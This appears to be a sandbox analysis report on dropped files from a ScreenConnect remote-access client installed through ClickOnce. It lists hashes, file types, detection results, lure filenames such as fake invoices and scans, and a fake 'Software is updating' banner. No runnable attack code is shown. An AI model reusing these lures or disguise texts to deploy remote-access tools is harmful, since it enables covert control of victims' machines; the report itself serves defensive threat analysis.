                                                                                                                                                MD5:BAFA0D8038589D30E1A14EF7B9A96FF1
                                                                                                                                                SHA1:ECB530C5FFC5DF2635B2201255ECE13FDA01FE5A
                                                                                                                                                SHA-256:FE94938067AFC744563D4C7D2597C5B28F1698ADCF0F225E9BE2D0F55F949563
                                                                                                                                                SHA-512:2AE1D1391D4CEFD64217A49F952ED2C94A3661828FD18083A1D2E1859C090E8E51F5D9E8C983EC8B93C7040D86E846473C8AB597F93CBF8C7B41ECB63E4E4707
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PcmH........#,..W.dV,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...............................................N...............................................N...............................................N...............................................N...............................................N...............................................N...nameScreenConnect.Cl
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1636
                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):95520
                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: E_BILL9926378035.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: He6pI1bhcA.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: VD01NDHM8u.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):61216
                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: E_BILL9926378035.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: He6pI1bhcA.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: VD01NDHM8u.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):266
                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):266
                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):81696
                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):266
                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):548864
                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1721856
                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):601376
                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                Malicious:false
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197120
                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):369
                                                                                                                                                Entropy (8bit):4.898555474937936
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l1tYMHwerc4KC:rHy2DLI4MWoHO8L9cAgRMZRCl1tYMHc6
                                                                                                                                                MD5:E6669504E0A5F3812CD3FE666F67F1EC
                                                                                                                                                SHA1:E552F6177354764FAFC0524CD24D5949ECFB1C70
                                                                                                                                                SHA-256:C15626455A649C93BF68D28A8296A0265ECC0A890EC301A435DAB03A1828884F
                                                                                                                                                SHA-512:F5ADA663869C1284FE85F2F49E88C2493DAE9C505F7452309DB167B2DD1F5CF6AB67838741ED0FB03C87ED443815BD4119FB0EE47E141D39A1E443DA4172EF41
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.@....>Software is updating... Please do not turn off your computer!...Updateing
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):257
                                                                                                                                                Entropy (8bit):4.896176001960815
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
                                                                                                                                                MD5:C72D7889B5E0BB8AC27B83759F108BD8
                                                                                                                                                SHA1:2BECC870DB304A8F28FAAB199AE6834B97385551
                                                                                                                                                SHA-256:3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
                                                                                                                                                SHA-512:2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):50133
                                                                                                                                                Entropy (8bit):4.759054454534641
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26722
                                                                                                                                                Entropy (8bit):7.7401940386372345
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                Malicious:false
